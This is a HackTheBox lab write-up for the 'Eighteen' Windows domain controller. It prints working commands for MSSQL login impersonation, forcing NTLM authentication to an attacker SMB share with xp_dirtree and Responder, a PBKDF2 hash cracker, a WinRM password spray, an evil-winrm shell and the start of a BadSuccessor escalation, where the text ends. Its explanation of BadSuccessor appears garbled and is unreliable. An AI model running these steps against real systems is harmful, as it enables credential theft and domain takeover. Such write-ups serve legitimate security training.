Eighteen
Writeup for HackTheBox Eighteen machine
Executive Summary
This report details the security assessment of the HackTheBox machine “Eighteen” (Windows Server 2025 Domain Controller). The attack chain is as follows:
- MSSQL Login Impersonation → Hash Cracking — Provided credentials
kevinauthenticate to MSSQL (local-auth). Impersonateappdevuser to accessfinancial_plannerDB. Extract Werkzeug PBKDF2-HMAC-SHA256 admin hash and crack it toiloveyou1. - Password Spray → WinRM — Spray the cracked password against domain users via WinRM. User
adam.scottreuses the password. Shell asadam.scott. - BadSuccessor (CVE-2025-53779) → DCSync → DA —
adam.scottis in theITgroup, which hasCreateChildon theStaffOU. Exploit BadSuccessor to create a dMSA pointing to Administrator. Request TGS via S4U2self, DCSync, and authenticate as Domain Administrator.
Machine Information
As is common in real life Windows penetration tests, you will start the Eighteen box with credentials for the following account: kevin / iNa2we6haRj2gaw!
Reconnaissance
An initial Nmap port scan was performed to discover active services, operating system versions, and potential entry points.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
┌──(kali㉿kali)-[~/HTB/Eighteen]
└─$ nmap -A $IP
Starting Nmap 7.95 ( https://nmap.org ) at 2025-11-16 07:54 UTC
Nmap scan report for 10.129.92.102
Host is up (0.21s latency).
Not shown: 997 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Did not follow redirect to http://eighteen.htb/
1433/tcp open ms-sql-s Microsoft SQL Server 2022 16.00.1000.00; RTM
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2025-11-16T05:19:30
| |_Not valid after: 2055-11-16T05:19:30
| |_ssl-date: 2025-11-16T11:04:33+00:00; +3h08m55s from scanner time.
| ms-sql-info:
| 10.129.92.102:1433:
| Version:
| name: Microsoft SQL Server 2022 RTM
| number: 16.00.1000.00
| Product: Microsoft SQL Server 2022
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
| ms-sql-ntlm-info:
| 10.129.92.102:1433:
| Target_Name: EIGHTEEN
| NetBIOS_Domain_Name: EIGHTEEN
| NetBIOS_Computer_Name: DC01
| DNS_Domain_Name: eighteen.htb
| DNS_Computer_Name: DC01.eighteen.htb
| DNS_Tree_Name: eighteen.htb
|_ Product_Version: 10.0.26100
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2022|2012|2016 (88%)
OS CPE: cpe:/o:microsoft:windows_server_2022 cpe:/o:microsoft:windows_server_2012:r2 cpe:/o:microsoft:windows_server_2016
Aggressive OS guesses: Microsoft Windows Server 2022 (88%), Microsoft Windows Server 2012 R2 (85%), Microsoft Windows Server 2016 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 3h08m54s, deviation: 0s, median: 3h08m54s
TRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
1 212.23 ms 10.10.14.1
2 216.60 ms 10.129.92.102
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 44.52 seconds
The scan confirms:
- HTTP Web Server (Port 80): Microsoft IIS 10.0 hosting a redirect to
eighteen.htb. - MSSQL Database (Port 1433): Microsoft SQL Server 2022 RTM.
- WinRM (Port 5985): Remote management port.
- Host Information: DC01 running Windows Server 2025 (build 26100).
To map domain resolution, the DNS settings were updated in /etc/hosts:
1
2
┌──(kali㉿kali)-[~/HTB/Eighteen]
└─$ echo "10.129.92.102 dc01.eighteen.htb eighteen.htb dc01" | sudo tee -a /etc/hosts
Enumeration of Web Services (Port 80)
Browsing the IIS web service revealed a Personal Finance Management (PFM) application designed for tracking personal budgets and allocations.
Attempting to authenticate into the application using the given credentials (kevin) failed, indicating that the account was either not registered on the web portal or possessed a different application credential.
Database Enumeration & Initial Foothold
Authentication via WinRM using the user kevin failed. However, checking authentication against the MSSQL instance using the local authentication flag succeeded.
1
2
3
4
5
6
7
8
9
10
11
┌──(kali㉿kali)-[~/HTB/Eighteen]
└─$ netexec winrm 10.129.92.102 -u kevin -p 'iNa2we6haRj2gaw!'
WINRM 10.129.92.102 5985 DC01 [*] Windows 11 / Server 2025 Build 26100 (name:DC01) (domain:eighteen.htb)
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from cryptography.hazmat.primitives.ciphers.algorithms in 48.0.0.
arc4 = algorithms.ARC4(self._key)
WINRM 10.129.92.102 5985 DC01 [-] eighteen.htb\kevin:iNa2we6haRj2gaw!
┌──(kali㉿kali)-[~/HTB/Eighteen/]
└─$ netexec mssql 10.129.92.102 -u kevin -p 'iNa2we6haRj2gaw!' --local-auth
MSSQL 10.129.92.102 1433 DC01 [*] Windows 11 / Server 2025 Build 26100 (name:DC01) (domain:eighteen.htb)
MSSQL 10.129.92.102 1433 DC01 [+] DC01\kevin:iNa2we6haRj2gaw!
RID Brute-forcing via MSSQL
A RID brute-force enumeration was initiated through the database connection to map domain users.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
┌──(kali㉿kali)-[~/HTB/Eighteen]
└─$ netexec mssql 10.129.92.134 -u kevin -p 'iNa2we6haRj2gaw!' --local-auth --rid-brute
MSSQL 10.129.92.134 1433 DC01 [*] Windows 11 / Server 2025 Build 26100 (name:DC01) (domain:eighteen.htb)
MSSQL 10.129.92.134 1433 DC01 [+] DC01\kevin:iNa2we6haRj2gaw!
MSSQL 10.129.92.134 1433 DC01 498: EIGHTEEN\Enterprise Read-only Domain Controllers
MSSQL 10.129.92.134 1433 DC01 500: EIGHTEEN\Administrator
MSSQL 10.129.92.134 1433 DC01 501: EIGHTEEN\Guest
MSSQL 10.129.92.134 1433 DC01 502: EIGHTEEN\krbtgt
MSSQL 10.129.92.134 1433 DC01 512: EIGHTEEN\Domain Admins
MSSQL 10.129.92.134 1433 DC01 513: EIGHTEEN\Domain Users
MSSQL 10.129.92.134 1433 DC01 514: EIGHTEEN\Domain Guests
MSSQL 10.129.92.134 1433 DC01 515: EIGHTEEN\Domain Computers
MSSQL 10.129.92.134 1433 DC01 516: EIGHTEEN\Domain Controllers
MSSQL 10.129.92.134 1433 DC01 517: EIGHTEEN\Cert Publishers
MSSQL 10.129.92.134 1433 DC01 518: EIGHTEEN\Schema Admins
MSSQL 10.129.92.134 1433 DC01 519: EIGHTEEN\Enterprise Admins
MSSQL 10.129.92.134 1433 DC01 520: EIGHTEEN\Group Policy Creator Owners
MSSQL 10.129.92.134 1433 DC01 521: EIGHTEEN\Read-only Domain Controllers
MSSQL 10.129.92.134 1433 DC01 522: EIGHTEEN\Cloneable Domain Controllers
MSSQL 10.129.92.134 1433 DC01 525: EIGHTEEN\Protected Users
MSSQL 10.129.92.134 1433 DC01 526: EIGHTEEN\Key Admins
MSSQL 10.129.92.134 1433 DC01 527: EIGHTEEN\Enterprise Key Admins
MSSQL 10.129.92.134 1433 DC01 528: EIGHTEEN\Forest Trust Accounts
MSSQL 10.129.92.134 1433 DC01 529: EIGHTEEN\External Trust Accounts
MSSQL 10.129.92.134 1433 DC01 553: EIGHTEEN\RAS and IAS Servers
MSSQL 10.129.92.134 1433 DC01 571: EIGHTEEN\Allowed RODC Password Replication Group
MSSQL 10.129.92.134 1433 DC01 572: EIGHTEEN\Denied RODC Password Replication Group
MSSQL 10.129.92.134 1433 DC01 1000: EIGHTEEN\DC01$
MSSQL 10.129.92.134 1433 DC01 1101: EIGHTEEN\DnsAdmins
MSSQL 10.129.92.134 1433 DC01 1102: EIGHTEEN\DnsUpdateProxy
MSSQL 10.129.92.134 1433 DC01 1601: EIGHTEEN\mssqlsvc
MSSQL 10.129.92.134 1433 DC01 1602: EIGHTEEN\SQLServer2005SQLBrowserUser$DC01
MSSQL 10.129.92.134 1433 DC01 1603: EIGHTEEN\HR
MSSQL 10.129.92.134 1433 DC01 1604: EIGHTEEN\IT
MSSQL 10.129.92.134 1433 DC01 1605: EIGHTEEN\Finance
MSSQL 10.129.92.134 1433 DC01 1606: EIGHTEEN\jamie.dunn
MSSQL 10.129.92.134 1433 DC01 1607: EIGHTEEN\jane.smith
MSSQL 10.129.92.134 1433 DC01 1608: EIGHTEEN\alice.jones
MSSQL 10.129.92.134 1433 DC01 1609: EIGHTEEN\adam.scott
MSSQL 10.129.92.134 1433 DC01 1610: EIGHTEEN\bob.brown
MSSQL 10.129.92.134 1433 DC01 1611: EIGHTEEN\carol.white
MSSQL 10.129.92.134 1433 DC01 1612: EIGHTEEN\dave.green
The domain users were parsed and saved to a file users.txt:
Interacting with Database Engine via Impacket
An interactive SQL shell was established using impacket-mssqlclient. A check on user status confirmed that the session executed within the low-privilege guest context.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
┌──(kali㉿kali)-[~/HTB/Eighteen/winrmexec]
└─$ impacket-mssqlclient kevin:'iNa2we6haRj2gaw!'@eighteen.htb
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC01): Line 1: Changed database context to 'master'.
[*] INFO(DC01): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (160 3232)
[!] Press help for extra shell commands
SQL (kevin guest@master)>
SQL (kevin guest@master)> SELECT USER_NAME();
-----
guest
SQL (kevin guest@master)>
Listing master databases revealed the database catalog:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
SQL (kevin guest@master)> SELECT name FROM master.sys.databases;
name
-----------------
master
tempdb
model
msdb
financial_planner
SQL (kevin guest@master)> USE financial_planner;
ERROR(DC01): Line 1: The server principal "kevin" is not able to access the database "financial_planner" under the current security context.
Accessing the target application database financial_planner failed due to security constraints. Evaluating roles showed that kevin was not a database administrator (sysadmin), and no remote database links were available to exploit.
1
2
3
4
5
6
7
8
9
10
SQL (kevin guest@master)>
SQL (kevin guest@master)> SELECT IS_SRVROLEMEMBER('sysadmin');
-
0
SQL (kevin guest@master)> EXEC sp_linkedservers;
SRV_NAME SRV_PROVIDERNAME SRV_PRODUCT SRV_DATASOURCE SRV_PROVIDERSTRING SRV_LOCATION SRV_CAT
-------- ---------------- ----------- -------------- ------------------ ------------ -------
DC01 SQLNCLI SQL Server DC01 NULL NULL NULL
SMB Hash Hijacking (xp_dirtree SMB leak)
To acquire the service account credentials of the database host, xp_dirtree was triggered to execute a remote file lookup against an SMB share managed by the attacker. This forces the Windows kernel running MSSQL to authenticate via NTLMv2 back to our listener.
1
2
3
4
SQL (kevin guest@master)> EXEC master..xp_dirtree '\\10.10.14.53\SHARE';
subdirectory depth
------------ -----
SQL (kevin guest@master)>
On the attacker host, responder captured the NTLMv2 hash:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
┌──(kali㉿kali)-[~/HTB/Eighteen]
└─$ sudo responder -I tun0
[sudo] password for kali:
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|
[+] Poisoners:
LLMNR [ON]
NBT-NS [ON]
MDNS [ON]
DNS [ON]
DHCP [OFF]
.
.
.
[+] Poisoning Options:
Analyze Mode [OFF]
Force WPAD auth [OFF]
Force Basic Auth [OFF]
Force LM downgrade [OFF]
Force ESS downgrade [OFF]
[+] Generic Options:
Responder NIC [tun0]
Responder IP [10.10.14.53]
Responder IPv6 [dead:beef:2::1033]
Challenge set [random]
Don't Respond To Names ['ISATAP', 'ISATAP.LOCAL']
Don't Respond To MDNS TLD ['_DOSVC']
TTL for poisoned response [default]
[+] Current Session Variables:
Responder Machine Name [WIN-312NKWKSG5S]
Responder Domain Name [F5DI.LOCAL]
Responder DCE-RPC Port [48244]
[*] Version: Responder 3.1.7.0
[*] Author: Laurent Gaffie, <lgaffie@secorizon.com>
[*] To sponsor Responder: https://paypal.me/PythonResponder
(+) Listening for events...
[SMB] NTLMv2-SSP Client : 10.129.92.102
[SMB] NTLMv2-SSP Username : EIGHTEEN\mssqlsvc
[SMB] NTLMv2-SSP Hash : mssqlsvc::EIGHTEEN:055cd54304e99d09:047B3D3BA309D9411DE62D028576E3F1:010100000000000080AB0523D156DC0117FD5028629985E50000000002000800460035004400490001001E00570049004E002D003300310032004E004B0057004B00530047003500530004003400570049004E002D003300310032004E004B0057004B0053004700350053002E0046003500440049002E004C004F00430041004C000300140046003500440049002E004C004F00430041004C000500140046003500440049002E004C004F00430041004C000700080080AB0523D156DC01060004000200000008003000300000000000000000000000003000008214642BE6C87E0889CE9BAD6FBA3EDAF2DABB2CEA86FB0196E9750C299421940A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310034002E00350033000000000000000000
Cracking the NTLMv2 hash via John the Ripper using the rockyou.txt wordlist yielded no match.
1
2
3
4
5
6
7
8
┌──(kali㉿kali)-[~/HTB/Eighteen]
└─$ john hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:14 DONE (2025-11-16 08:17) 0g/s 971141p/s 971141c/s 971141C/s !)(OPPQR..*7¡Vamos!
Session completed.
Exploiting Login Impersonation (appdev)
An enumeration of SQL logins was performed using netexec to check for administrative user objects or potential impersonation pathways.
1
2
3
4
5
6
7
8
┌──(kali㉿kali)-[~/HTB/Eighteen]
└─$ netexec mssql 10.129.92.134 -u kevin -p 'iNa2we6haRj2gaw!' --local-auth -M enum_logins
MSSQL 10.129.92.134 1433 DC01 [*] Windows 11 / Server 2025 Build 26100 (name:DC01) (domain:eighteen.htb)
MSSQL 10.129.92.134 1433 DC01 [+] DC01\kevin:iNa2we6haRj2gaw!
ENUM_LOGINS 10.129.92.134 1433 DC01 [+] Logins found:
ENUM_LOGINS 10.129.92.134 1433 DC01 [*] - sa
ENUM_LOGINS 10.129.92.134 1433 DC01 [*] - kevin
ENUM_LOGINS 10.129.92.134 1433 DC01 [*] - appdev
Checking SQL impersonation rights (IMPERSONATE permissions) revealed that kevin could impersonate the appdev user.
1
2
3
4
5
6
┌──(kali㉿kali)-[~/HTB/Eighteen]
└─$ netexec mssql 10.129.92.134 -u kevin -p 'iNa2we6haRj2gaw!' --local-auth -M enum_impersonate
MSSQL 10.129.92.134 1433 DC01 [*] Windows 11 / Server 2025 Build 26100 (name:DC01) (domain:eighteen.htb)
MSSQL 10.129.92.134 1433 DC01 [+] DC01\kevin:iNa2we6haRj2gaw!
ENUM_IMP... 10.129.92.134 1433 DC01 [+] Users with impersonation rights:
ENUM_IMP... 10.129.92.134 1433 DC01 [*] - appdev
Switching the execution context to appdev allowed access to the master databases:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
SQL (kevin guest@master)> EXECUTE AS LOGIN = 'appdev';
SQL (appdev appdev@master)>
SQL (appdev appdev@master)> SELECT name FROM master.sys.databases;
name
-----------------
master
tempdb
model
msdb
financial_planner
SQL (appdev appdev@master)> USE financial_planner
ENVCHANGE(DATABASE): Old Value: master, New Value: financial_planner
INFO(DC01): Line 1: Changed database context to 'financial_planner'.
SQL (appdev appdev@financial_planner)>
The financial_planner catalog schemas and tables were dumped. The users table contained administrative credentials.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
SQL (appdev appdev@financial_planner)> SELECT * FROM information_schema.tables;
TABLE_CATALOG TABLE_SCHEMA TABLE_NAME TABLE_TYPE
----------------- ------------ ----------- ----------
financial_planner dbo users b'BASE TABLE'
financial_planner dbo incomes b'BASE TABLE'
financial_planner dbo expenses b'BASE TABLE'
financial_planner dbo allocations b'BASE TABLE'
financial_planner dbo analytics b'BASE TABLE'
financial_planner dbo visits b'BASE TABLE'
SQL (appdev appdev@financial_planner)> SELECT * FROM financial_planner.dbo.incomes;
id user_id monthly_salary yearly_salary created_at
-- ------- -------------- ------------- ----------
SQL (appdev appdev@financial_planner)> SELECT * FROM financial_planner.dbo.users;
id full_name username email password_hash is_admin created_at
---- --------- -------- ------------------ ------------------------------------------------------------------------------------------------------ -------- ----------
1002 admin admin admin@eighteen.htb pbkdf2:sha256:600000$AMtzteQIG7yAbZIa$0673ad90a0b4afb19d662336f0fce3a9edd0b7b19193717be28ce4d66c887133 1 2025-10-29 05:39:03
SQL (appdev appdev@financial_planner)> SELECT * FROM financial_planner.dbo.incomes;
id user_id monthly_salary yearly_salary created_at
-- ------- -------------- ------------- ----------
SQL (appdev appdev@financial_planner)>
SQL (appdev appdev@financial_planner)> SELECT * FROM financial_planner.dbo.expenses;
id user_id category type value created_at
-- ------- -------- ---- ----- ----------
SQL (appdev appdev@financial_planner)>
SQL (appdev appdev@financial_planner)> SELECT * FROM financial_planner.dbo.allocations;
id user_id savings investments created_at
-- ------- ------- ----------- ----------
SQL (appdev appdev@financial_planner)>
SQL (appdev appdev@financial_planner)> SELECT * FROM financial_planner.dbo.analytics;id metric_name metric_value last_updated
-- ----------- ------------ ------------
SQL (appdev appdev@financial_planner)>
SQL (appdev appdev@financial_planner)> SELECT * FROM financial_planner.dbo.visits;
id user_agent visited_page timestamp
---- ---------------------------------------------------------------------- ------------ ----------
1 Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0 / 2025-10-27 16:53:21
2 Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0 / 2025-10-27 16:53:23
3 Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0 / 2025-10-27 16:53:24
....
....
Flask Werkzeug Hash Cracking
The recovered admin hash signature uses the format:
1
pbkdf2:sha256:600000$AMtzteQIG7yAbZIa$0673ad90a0b4afb19d662336f0fce3a9edd0b7b19193717be28ce4d66c887133
This represents:
- Algorithm: PBKDF2-HMAC-SHA256
- Iterations: 600,000
- Salt:
AMtzteQIG7yAbZIa - Hash Digest:
0673ad90a0b4afb19d662336f0fce3a9edd0b7b19193717be28ce4d66c887133
Due to the extremely high iteration count (600,000) and custom formatting structure, native GPU cracking programs are inefficient. Instead, a custom Python cracker script was written using Python’s standard hashlib.pbkdf2_hmac library.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
import hashlib
import binascii
# From database
hash_from_db = "0673ad90a0b4afb19d662336f0fce3a9edd0b7b19193717be28ce4d66c887133"
salt = "AMtzteQIG7yAbZIa"
iterations = 600000
# Example wordlist
with open("/usr/share/wordlists/rockyou.txt", "r", encoding="latin-1") as f:
for line in f:
password = line.strip()
dk = hashlib.pbkdf2_hmac(
'sha256',
password.encode(),
salt.encode(),
iterations
)
if binascii.hexlify(dk).decode() == hash_from_db:
print(f"[+] Found password: {password}")
break
Running the cracker successfully recovered the plain-text password:
1
2
3
┌──(kali㉿kali)-[~/HTB/Eighteen]
└─$ python3 hash_crack.py
[+] Found password: iloveyou1
Remote WinRM Access
Although the web portal rejected login attempts with admin:iloveyou1 (due to registration restrictions or database mismatch), a domain-wide password spray against WinRM was executed using the recovered password iloveyou1.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
┌──(kali㉿kali)-[~/HTB/Eighteen]
└─$ netexec winrm 10.129.92.134 -u users.txt -p 'iloveyou1'
WINRM 10.129.92.134 5985 DC01 [*] Windows 11 / Server 2025 Build 26100 (name:DC01) (domain:eighteen.htb)
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from cryptography.hazmat.primitives.ciphers.algorithms in 48.0.0.
arc4 = algorithms.ARC4(self._key)
WINRM 10.129.92.134 5985 DC01 [-] eighteen.htb\jamie.dunn:iloveyou1
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from cryptography.hazmat.primitives.ciphers.algorithms in 48.0.0.
arc4 = algorithms.ARC4(self._key)
WINRM 10.129.92.134 5985 DC01 [-] eighteen.htb\jane.smith:iloveyou1
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from cryptography.hazmat.primitives.ciphers.algorithms in 48.0.0.
arc4 = algorithms.ARC4(self._key)
WINRM 10.129.92.134 5985 DC01 [-] eighteen.htb\alice.jones:iloveyou1
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from cryptography.hazmat.primitives.ciphers.algorithms in 48.0.0.
arc4 = algorithms.ARC4(self._key)
WINRM 10.129.92.134 5985 DC01 [+] eighteen.htb\adam.scott:iloveyou1 (Pwn3d!)
The user adam.scott was compromised. A shell was spawned over evil-winrm:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
┌──(kali㉿kali)-[~/HTB/Eighteen]
└─$ evil-winrm -i eighteen.htb -u adam.scott -p iloveyou1
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\adam.scott\Documents> cd ..\Desktop
*Evil-WinRM* PS C:\Users\adam.scott\Desktop> ls
Directory: C:\Users\adam.scott\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 11/16/2025 11:04 AM 34 user.txt
*Evil-WinRM* PS C:\Users\adam.scott\Desktop> cat user.txt
************1131dd3144f0e680e23a
User privileges were mapped using the whoami /priv command:
1
2
3
4
5
6
7
8
9
10
*Evil-WinRM* PS C:\Users\adam.scott\Desktop> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
Active Directory Enumeration (SharpHound)
Due to firewall restrictions blocking incoming LDAP (389) and Global Catalog (3268) queries externally, the standard bloodhound-python ingestor could not be used. Instead, SharpHound.exe was uploaded and executed locally on the Windows target host inside a temporary directory.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
*Evil-WinRM* PS C:\Users\adam.scott\Desktop> mkdir \Temp
Directory: C:\
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 11/16/2025 2:35 PM Temp
*Evil-WinRM* PS C:\Users\adam.scott\Desktop> cd \Temp
*Evil-WinRM* PS C:\Temp> upload SharpHound.exe
Info: Uploading /home/kali/HTB/Eighteen/SharpHound.exe to C:\Temp\SharpHound.exe
Data: 1753768 bytes of 1753768 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\Temp> .\SharpHound.exe -c all
2025-11-16T14:37:31.0061178-08:00|INFORMATION|This version of SharpHound is compatible with the 5.0.0 Release of BloodHound
2025-11-16T14:37:31.2003757-08:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote, UserRights, CARegistry, DCRegistry, CertServices, LdapServices, WebClientService, SmbInfo, NTLMRegistry
2025-11-16T14:37:31.2386873-08:00|INFORMATION|Initializing SharpHound at 2:37 PM on 11/16/2025
2025-11-16T14:37:31.3475352-08:00|INFORMATION|Resolved current domain to eighteen.htb
2025-11-16T14:37:42.6465301-08:00|INFORMATION|Flags: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote, UserRights, CARegistry, DCRegistry, CertServices, LdapServices, WebClientService, SmbInfo, NTLMRegistry
2025-11-16T14:37:42.7751106-08:00|INFORMATION|Beginning LDAP search for eighteen.htb
2025-11-16T14:37:42.7771193-08:00|INFORMATION|Collecting AdminSDHolder data for eighteen.htb
2025-11-16T14:37:42.8405279-08:00|INFORMATION|AdminSDHolder ACL hash 0CF24F884FD0E60DA72B191DC1D3CD6A28B81B51 calculated for eighteen.htb.
.
.
.
2025-11-16T14:37:44.4723093-08:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for EIGHTEEN.HTB
2025-11-16T14:37:44.5376101-08:00|INFORMATION|Beginning LDAP search for eighteen.htb Configuration NC
2025-11-16T14:37:46.0064828-08:00|INFORMATION|Producer has finished, closing LDAP channel
2025-11-16T14:37:46.0105018-08:00|INFORMATION|LDAP channel closed, waiting for consumers
2025-11-16T14:37:51.5828642-08:00|INFORMATION|Consumers finished, closing output channel
Closing writers
2025-11-16T14:37:51.6213793-08:00|INFORMATION|Output channel closed, waiting for output task to complete
2025-11-16T14:37:51.7545385-08:00|INFORMATION|Status: 318 objects finished (+318 39.75)/s -- Using 78 MB RAM
2025-11-16T14:37:51.7545385-08:00|INFORMATION|Enumeration finished in 00:00:08.9986748
2025-11-16T14:37:51.8620949-08:00|INFORMATION|Saving cache with stats: 17 ID to type mappings.
0 name to SID mappings.
1 machine sid mappings.
3 sid to domain mappings.
0 global catalog mappings.
2025-11-16T14:37:51.9122969-08:00|INFORMATION|SharpHound Enumeration Completed at 2:37 PM on 11/16/2025! Happy Graphing!
*Evil-WinRM* PS C:\Temp> ls
Directory: C:\Temp
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 11/16/2025 2:37 PM 29264 20251116143745_BloodHound.zip
-a---- 11/16/2025 2:37 PM 1382 MGE1ZTIxYmUtZjVmMS00YzI1LWFjMzktZDdlNDBkZGFhYmQw.bin
-a---- 11/16/2025 2:36 PM 1315328 SharpHound.exe
*Evil-WinRM* PS C:\Temp> download 20251116143745_BloodHound.zip
Info: Downloading C:\Temp\20251116143745_BloodHound.zip to 20251116143745_BloodHound.zip
Info: Download successful!
The downloaded BloodHound archive was loaded into the BloodHound console to trace incoming and outbound permissions.
- Reviewing the user account ADAM.SCOTT@EIGHTEEN.HTB, there are no immediate outbound objects under direct control.
- Check on groups:
adam.scottis a member of theITgroup.
- Identifying sessions:
adam.scottholds an active session on the domain controller computer objectDC01.EIGHTEEN.HTB.
- Direct PSRemote privileges to the target computer object exist but don’t provide administrative paths.
Domain Privilege Escalation: BadSuccessor (CVE-2025-53779)
Verifying Server Platform
The target host execution context was verified using Get-ADDomainController to confirm the operating system.
1
2
3
4
5
*Evil-WinRM* PS C:\Temp> Get-ADDomainController -Filter * | Select-Object HostName, OperatingSystem, OperatingSystemVersion
HostName OperatingSystem OperatingSystemVersion
-------- --------------- ----------------------
DC01.eighteen.htb Windows Server 2025 Datacenter 10.0 (26100)
The domain controller runs Windows Server 2025, which is vulnerable to the BadSuccessor privilege escalation exploit.
BadSuccessor Attack Vector Explained
BadSuccessor (CVE-2025-53779) is a logical privilege escalation vulnerability residing within the Active Directory architecture of Windows Server 2025.
- The Mechanism: Windows Server 2025 introduced Directory Managed Machine Secret Attributes (DMSA) for machine secret updates.
- When a computer rotates secrets or properties, AD creates a “successor” computer metadata object linked to a predecessor.
- During object creation, Windows copies the security descriptors and configuration permissions from the predecessor.
- The Vulnerability: High-privilege access rights and security flags that should never propagate are inherited by the new successor object.
- The Prerequisite: An attacker needs the ability to write a new computer object inside an OU (e.g.
CreateChildrights). By creating a successor linked to a highly privileged predecessor (such as the Domain Administrator), the attacker can inherit administrative rights.
To analyze and exploit this vulnerability, the tool script Invoke-BadSuccessor.ps1 from researcher b5null (Invoke-BadSuccessor.ps1) was imported.
A tutorial for this vulnerability is detailed by The Weekly Purple Team.
Executing the Exploitation Chain
First, the script was imported to search for target OUs with the necessary permissions.
1
2
3
4
5
6
7
8
9
10
11
*Evil-WinRM* PS C:\Temp> . .\Invoke-BadSuccessor.ps1
*Evil-WinRM* PS C:\Temp>
*Evil-WinRM* PS C:\Temp> Find-VulnerableOU
ObjectDN : OU=Staff,DC=eighteen,DC=htb
IdentityReference : EIGHTEEN\IT
SecurityIdentifier : S-1-5-21-1152179935-589108180-1989892463-1604
ActiveDirectoryRights : CreateChild
AccessControlType : Allow
IsInherited : False
